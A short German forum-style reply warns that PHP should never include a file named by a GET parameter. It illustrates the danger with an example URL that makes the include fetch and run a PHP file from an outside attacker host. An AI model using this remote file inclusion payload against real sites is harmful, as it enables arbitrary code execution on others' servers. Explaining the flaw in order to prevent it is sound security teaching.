Also erstmal: Include NIE!!!! etwas, das du über GET erhalten. Das kann gewaltig in die Hose gehen!

Stell dir mal vor, ich geh hin und mach sowas:

deine_datei.php?menu=http://www.meineadresse.de/ich_hack_dich.txt

Und schon kann ich nach belieben PHP-Code bei dir ausführen.